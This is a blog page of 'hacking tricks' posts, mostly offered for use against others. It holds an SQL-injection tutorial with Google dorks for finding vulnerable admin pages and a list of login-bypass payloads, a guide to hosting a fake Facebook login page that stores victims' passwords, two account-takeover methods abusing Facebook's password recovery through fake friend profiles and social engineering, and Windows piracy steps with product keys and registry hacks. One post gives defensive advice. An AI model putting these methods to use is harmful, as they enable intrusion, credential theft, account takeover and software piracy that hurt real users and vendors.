Latest Post

KNOW WHO IS ONLINE WHILE U R OFFLINE IN FACEBOOK(Facebook Trick)


Who are online on facebook





KNOW WHO IS ONLINE WHILE U
R OFFLINE IN FACEBOOK----------- 
Steps:- 
1) Go offline. coz if u r online then there no use of this trick. 
2) Now type ONLINE NOW in Facebook search box. 
3) Click on the first app. 
4) Follow the steps same as in other steps.
5) CONGRATS!!! ur online frnz list is in front of u while u r
offline.(this page refreshes automaticlly in 15 sec so no
need to worry)


 

MICRO SD Memory Card Password Remover(How-tos)




MICRO SD Memory Card Password Recovery / removing 4 method.

Solution 1:

For Symbian Mobiles:

1. Download and Install  FExplorer

2. Insert your card into your phone, without accessing it through the phone

3. Run FExplorer and Open the path C:\system

4. Find the file called mmcstore, and rename it mmcstore.txt

5. Copy that file (mmcstore.txt) to your PC and open it in Notepad

6. Your password will be located within that file.

Solution 2:

For Symbian Mobiles:

1. Download and Instal X-Plore

2. Now open the X-Plore and press Zero(0) then check you have marked the

    "Show the System Files".

3. After you done the above step now go to the file:

    C:/Sys/Data/Mmcstore

4. If you found the above path then press the option "3" to set the Hex-Viewer.

5.  Now look the third column you can see the code like ! TMSD02G (c ??”? x???3?3?3?3?3)

Now see the characters between '?' because it is your password 33333.

6. You mayn't able to access the path file:

    C:/Sys/Data/Mmcstore

    if you don't set the password for the memory card.

Solution 3:

For Micro SD:

Put the card in any E series mobile or N95 etc and format it.

It will not ask for a password.

Solution 4:

1. Go to file manager on your mobile

2. In Settings choose system folders,

3. In the System folder, find a file called mmcstore

4. Send the file to your PC using IR/Bluetooth

5. Open the file in Notepad

6. The password you need for your memory card is located within that file


 

Hack any site(Hacking Trick)

Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries.
What is SQL Injection?
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Step-by-Step tutorial for SQL Injection                          
  
[Step – 1] Find SQL Injection Vulnerable Website
First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.
1) By Google Dork
Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.
There is a large number of Google dork for basic SQL injection. Here is the best:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp
\
2) By Automated Tools
Today many tools are available for found a vulnerable site. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password. “Actually finding admin page is nothing but just a directory of a particular website“.
You can use Admin Finder Script (Perl Script) . I share this script in my previous post. You can get this script and see the tutorial.
[Step - 2] SQL Injection Queries
Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.
‘or’’=’
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 -- 
[Step – 3] Exploitation Web Applications by SQL Injection
After find admin page of any vulnerable web application. We can exploit that vulnerable web application using client supplied SQL queries. Its enable to execute unauthorized SQL commands.
For example, when a user logs onto a webpage by using user name and password for validation, a SQL query is used there. However an attacker can use SQL\ injection to send specially crafted username and password fields that poison the original SQL queries.
Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a sql vulnerable website
http://demo.testfire.net/bank/login.aspx .
We found an SQL injection point for exploitation. In the image below we can see login page or user authentication form of this web site.
Click Her To See This Page
www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user. 
The query has the following format:
SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'
The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.
The authentication requires the user to enter a valid username and password. We don’t know the valid user name and password. We inject here some SQL queries to bypass login. In username filed we type admin as a username and in password filed we set “or”=”
The query has the following format:
SELECT *
FROM admin
WHERE username = 'admin' AND password = '’or’’=’'

If the query runs successfully we will bypass the login without knowing username and password. In the below Image we can see we bypass login and we use admin panel as an administrator. We manage website contains as we want.
* In My next post we will discuss about Blind SQL Injection.
If you like this post then kindly Share with your friends and groups and
Thank You For Visiting.....


 

How To Make Window Genuiene(How-tos)






Make Your Windows Genuine* For XP sp2.

How to validate your non original Windows XP sp2

Follow the instructions carefully:
INSTRUCTIONS HOW TO VALIDATE YOUR NON ORIGINAL WINDOWS XP:

1- Click in start and then in run

2- Type in regedit and then ok

3- In the regedit, go to this following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WPAEvents

4- On the right panel, double click in OOBETimer

5- In the opened window delete all values and click OK. Shut the regedit

6- Go again in start > run and this time type:

%systemroot%\system32\oobe\msoobe.exe /a

7- In the window that oppened, choose the option... YES I WISH TO MAKE A PHONE CALL... ( or something similar to this sentence )

8- In the next step, click in the button that says CHANGE PRODUCT KEY ( or something similar )

9- In the next step, type a CD-Key:

THMPV-77D6F-94376-8HGKG-VRDRQ
and click to update

10- After clicking in the update button, the assistant to activation will return one page, then click in " remember me later ", and restart Windows again.

11- Restart Windows, go again in start > run and type:

%systemroot%\system32\oobe\msoobe.exe /a

12- The following message will appear:

Windows activation


Windows is now activated


For remove black screen
:



http://www.softpedia.com/get/Tweak/Uninstallers/RemoveWGA.shtml


Make Your Windows Genuine* For XP sp3
Follow the instructions carefully:
On ur desktop select new text document and paste the foll information... (that is from Windows registry editor.........to.....................8d,6f,d5,33,93,fd)

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\
31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\
00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3
"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\
d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\
4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

after that save it as "emaad.reg" or any name as long as it has a .reg extension.
in file type select "all file" and save.
thn double click the new icon tht comes on ur desktop.
to chk if it has worked. go to

]http://www.microsoft.com/genuine/default.aspx?displaylang=en[
and click on validate windows to ur right....
keys.~
http://rapidshare.com/files/217326169/windows.reg

Another Trick For Windows XP Genuine.

Start>>
run>>
regedit>>
HKEY_LOCAL_MACHINE>>
SOFTWARE>>
Microsoft
>>
Windows NT >>
Current Version >>
WPAEvents >>
Double click OOBETimer >>
Select all and delete >>
FF D5 71 D6 8B 6A 8D 6F D5 33 93 FD >>
Right click on WPAEvents >>
Permissions >>
System >>
Deny Full Control >>
Apply >>
Yes >>
OK >>
Done!

If Necessary then Reboot Your Computer..


Make Your Window 7 Genuine.


Torrent Link: >> Download << 100% Tested
Install this torrent file and Reboot your computer..
Now you can that your Window is Genuine


                                                 Another trick  windows 7 activator plus


Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Go to “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter
slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days.
So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using “slmgr -rearm” command before registry edit
+                                                                                                                                                                 
240 days using “slmgr -rearm” command after registry edit
 =      360 Days



The latest windows operating system - windows 7 ke

windows 7 keys are:

H3RCX-HC6QD-DB492-YWGHP-3PB4C
PVBHT-4796G-KM9Q3-7V8HD-J6V7M
FGXGR-D4GTB-6YY24-HG67D-FPQJV
PMMB7-VPWQM-R4TBJ-RQW4F-4J6JB
H2CF9-HX9MM-KY3XQ-26W9C-BYYYX
MKCRW-7BVW9-QT44X-QK7J3-RTJ79
6D72M-BGMX8-R8C6H-PFD72-Q3W6F
VVCFH-4P4X2-KMFG2-PBPK3-G9X93
W3DDG-QM7B8-4J499-J8Q22-R3QW6
Q7WQW-QJBW8-C72H6-M8TX9-P4TB6
W2RQF-RRR9B-3BF7T-K2WYB-M7M8Q
XJBCD-6QCVR-RFBWX-939GC-KHC9J
4DMCV-P3RYB-YRTVW-RW4Q6-BVM9P
2VY3F-F8WVR-7D3VV-YYF37-QVQKV





 

Window Hacking(Hacking Trick)





>>Open COMMAND PROMPT while Locked by User.
 
>open notepad
>type www.command.com
> then save as cmd.bat at desktop
>then enter now its open.....enjoy


>>If your computer is slow?
then clean up the ram..

>Open notepad
>type FREEMEM=SPACE(64000000)
>Save it as ram.vbs
now run the script.
Check out !!



>>CracK BIOS Password
>Open the CPU
>Observe the Motherbord
>Remove the Silver Battery(3v)
>Wait 2 minutes and place the Battery
>>Restoring a Lost Desktop-
>Start
>Run
Type a period " . "
Then press Enter



>>If ur PC is hanged then do this.
Press shift+ctrl+esc or ctrl+alt+del
n den click on 'END TASK'
ur PC is runing now


>>create folder without name
>select any folder
>rename it
>press alt & type 0160 or 255
>enter


>>Amazing trick for use
Windows Backup Utility if installed
go to run
type ntbackup
ok
Now use backup


>>Increase the speed of your file sharing
Simple Way to Share Multiple Folders :
Goto Run and Type SHRPUBW.EXE then press Enter
Select the folder you want to share and Set permissions,
your share folder is ready now..... 



>>Turning off the Help on Min, Max, Close Icons
When the mouse goes over the minimize, maximize and close icons on the upper
right hand side of a window.

To disable that display:
1. Start Regedit
2. Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
3. Create a String Value called MinMaxClose
4. Give it a value of 1
5. Reboot


>>FIX CORRUPTED FILE IN WINDOW XP
1.Load XP cd into cd drive

2. go to Run

3. type sfc/scannowok

4. Then copy its lost file frm cd.


 
>>AUTO DELETE TEMPORARY FOLDER.!!
what i prefer is %temp% " without quotes.. at Start -> Run.. this opens ur temp folder n den u cal erase it nearly
First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in
that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.


>>Locking Folders:
  • Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
  • Now open the Notepad and type the following
[code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]
  • Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
  • Open another new notepad text file and type the following
[code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code]
  • Save the text file as key.bat in the same drive.
Steps to lock the folder:
  • To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
  • To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
>>Locking Drives:
We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
  • Start & Run and type Regedit to open Registry editor
  • Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
  • Create a new DWORD value NoViewOnDrive and set its value as
2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
  • To lock more drives, calculate the value of each drive and then set sum of those numbers as value
  • To unlock your drive just delete the key from the registry.
>>To Remove Recyle Bin From Your Desktop
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
>>Disable the Security Center warnings
Follow the given steps to edit the computer registry for disable message:
First click on Start button then type Regedit in Run option.
Here locate the location to:
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Here in right side panel, double click on Anti Virus Disable Notify and set its value 1.
Now close the registry editor and restart your computer after any changes to go into effect.


>>HIDE DRIVES
How to Hide the drives(c:,d:,e:,a:...etc)


To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 \Explorer

2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .

4.Restart the computer.

5.Now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.

>>Show your name in taskbar

Trick to Show Your name after time in taskbar...
Try this trick to add up ur name in place of AM and PM beside time Its simple

Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK
 Done


 

Hack Facebook wiht Phishing(Hacking Trick)



Welcome to "HACKING begins - An approach to introduce people with the truth of HACKING". Today i got many mails related easiest way to Facebook hacking so i decided to post article on FACEBOOK HACKING. 

What is phishing?
Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites likeYahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password.
Phishing Procedure:
Step 1 : First of all download Facebook fake login page
Step 2 : Now open login.php and find (CTRL+F) 'http://www.hackingbegins.com' then change it to your to is the 'http://www.facebook.com' if you want.

Step 3 : Create an account in http://www.my3gb.com/
Step 4 : Then upload all the files Index.htm,login.php in my3bg directory or an other. Open your phishing page. Just type some info into the text box and then you will see in your file manager that a file called "Passwords.htm" is created, In which the password is stored.
Hope this was informative, kindly post your views or comments on this article.


Want to hack facebook password.

Just donwload the files given below and upload them to free web hosting sites such as ripway,110mb etc.
List of Some Free  Hosting Websites For Phishing
http://hackingarticls.blogspot.com/2012/04/where-to-host-my-phishing-page-free.html


 

Hack facebook account easily(Hacking Trick)

Hack facebook account easily

In this tutorial no skill is required, we'll just use the password recovery process with 3 fake profiles.

(The fake profiles should be at least three weeks old)
.

For this you need to make 3 fake profiles on Facebook, and the victim that you want to hack should be added to the friend's list mutual friends would be nice. 

Recovery process, which is accessible through Forgot your password? on the Facebook login page.

Then you need to identify your victim's account by using his Facebook E-mail, Facebook name or Facebook name + Facebook friend's name. It would be easier to identify the victim with his or her facebook name. When you got the account, just click on This Is My account.

Once you could identify you're victimss profile, Facebook suggests you to recover the password by the existing email address. You can bypass that by clicking on No longer have access to these?

Then Facebook will ask a secret question(If the victim has one), to bypass that, you'll need to type the wrong answer three times. After that Facebook will try to help you recover the password by the support of 3 friends.

Just select your three fake profiles that your slave added to his friends.(The friends must be registered more than three weeks).

Then you'll get the code on your fake profiles, with those 3 codes you can easily change the password.


 

How To Hack Facebook Accounts Easily (Hacking Trick)


How to Hack Any Facebook Account easily by Reverting/Reseting Password of your Victim – No Keylogging, Phishing Required.


Hack a Facebook account by the method of reverting the password.
This method does not involve any skill or anything just a brain would be enough to get you through this trick ! Well,
you might think that it is impossible but it is actually true that you can hack any facebook account !
So before we start i would like to tell you what ''Reverting'' actually means…

What is Reverting ?

Reverting is the process of resetting a password without the knowledge of the actual user !
So this is basically a low level of hacking but it does the job for you !

How do I hack my friend’s Facebook ?

Make sure your not logged in to your account.
If you are then make sure you sign out and then follow the following methods.


1- Go Here
That is the form that you will be using in order to hack your user.

2- Then in ''Your E-mail Address'' type your E-mail address.

3- Fill the Details.

4- Once you have done that,You will have a question asking ''Email associated with the compromised account.'' – In that just type ''No'' and nothing else other than that !

5- In ''Your contact email address.'' – Type your own email for you to receive the Password Reset Link.

6- In the ''Full Name of the Account.'' – Type the Name of your victim if you know.If you don’t then:

a) Try finding the Name of the victim by just searching his/her e-mail on Facebook.
b) If that doesn’t work then google the E-mail address of your Victim,that might give you some details.
c) If that also doesn’t work then use the following sites to get them

--> GO HERE

--> GO HERE
So if you follow one of the above methods you should be getting the Full Name of your victim.Now lets move on to the next step
7- “Date Of Birth” – In this column you have to enter the Birthday of your Victim.If you know him personally then you should be knowing it.If not you can just social engineer him and somehow make him tell it.Once you get it you have to enter it in that.

8- “URL (web address) of your compromised profile.” – This is just the profile URL of your Victim which can be got easily(Usually of the form: http://www.facebook.com/profile.php?id=99999)

9- Now your all set ! Before you submit the form just make sure you recheck the whole form if you have done the right thing.Once you do so just click on “Submit”

10- Thats it ! You have done it ! Now you just have to wait for Facebook team to look up for your request ! Once they approve it they will send a link to reset your victim’s Password !


 

How hackers hack Facebook Account & How to stop them?(Hacking Trick)

How hackers hack Facebook Account & How to stop them?

Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many hackers (or should I say crackers?) are actively involved in hacking Facebook accounts of unsuspecting users. This article outlines the many strategies that such hackers use to gain access to Facebook accounts of hundreds of users each day and how you can stop them from hacking your account.
hack facebook account


Email Address Hack


I have always been puzzled by Facebook's leniency in this matter. All a hacker needs to do is know your email address and he will be displayed a confirmation showing your name even if he enters the wrong password. How easily a hacker can then hack your Facebook account if he 'guesses' your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly. Until Facebook does so, here are some tricks you can use to protect yourself from this vulnerability.

How to safeguard your Email Address?
Just follow these steps:-
  1. Hide your Email Address from everyone by going to Edit Profile>Contact Information>Clicking on the icon beside your email address> checking 'Only Me'.
  2. Change your primary email address to a one that is only known to you by going to Account Settings>Email> and changing your primary email to the new one (known only to you) and removing your previous email address.
  3. For additional security, when in Account Settings, check 'Secure browsing' and 'Send me an email when a new computer or mobile device logs into this account' and click Save.
    hack facebook
Phishing
Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user's login credentials.

How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various "Facebook widgets" offered by websites and blogs. Instead, use Facebook's homepage to sign in. Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it.
hack facebook password
Keylogging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

How to stop keyloggers?

nstall a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person's flash and pen drives before using them on your computer.


 

Hack facebook account without phishing or keylogger ;-) (Hacking Trick)


How to hack any facebook account easily by Reverting/Reseting pass of your victim NO keyloging pishing required
Here is one more interesting tip on how to hack a Facebook account by the method of reverting the password.This method does not involve any skill or anything just a brain would be enough to get you through this trick ! Well,you might think that it is impossible but it is actually true that you can hack any facebook account ! So before we start i would like to tell you what “Reverting” actually means…
What is Reverting ?
Reverting is the process of resetting a password without the knowledge of the actual user ! So this is basically a low level of hacking but it does the job for you !
For more on reverting go here : What exactly is reverting ?
How do I hack my friend’s Facebook ?
Make sure your not logged in to your account.If you are then make sure you sign out and then follow the following methods
1.Go to this link:
That is the form that you will be using in order to hack your user.
2.Then in “Your E-mail Address” type your E-mail address.
3.Then apply the following options as in the image below.

4.Once you have done that,You will have a question asking “Email associated with the compromised account.” – In that just type “No” and nothing else other than that !
5.In “Your contact email address.” – Type your own email for you to receive the Password Reset Link.
6.In the “Full Name of the Account.” – Type the Name of your victim if you know.If you don’t then:
a.Try finding the Name of the victim by just searching his/her e-mail on Facebook.
b.If that doesn’t work then google the E-mail address of your Victim,that might give you some details.
c.If that also doesn’t work then use the following sites to get them
http://com.lullar.com/
http://www.pipl.com/email/
So if you follow one of the above methods you should be getting the Full Name of your victim.Now lets move on to the next step
7.”Date Of Birth” – In this column you have to enter the Birthday of your Victim.If you know him personally then you should be knowing it.If not you can just social engineer him and somehow make him tell it.Once you get it you have to enter it in that.
8.”URL (web address) of your compromised profile.” – This is just the profile URL of your Victim which can be got easily(Usually of the form: http://www.facebook.com/profile.php?id=99999)
9.Now your all set ! Before you submit the form just make sure you recheck the whole form if you have done the right thing.Once you do so just click on “Submit”
10.Thats it ! You have done it ! Now you just have to wait for Facebook team to look up for your request ! Once they approve it they will send a link to reset your victim’s Password !


 
 

Copyright © 2011. Tricks Duniya - All Rights Reserved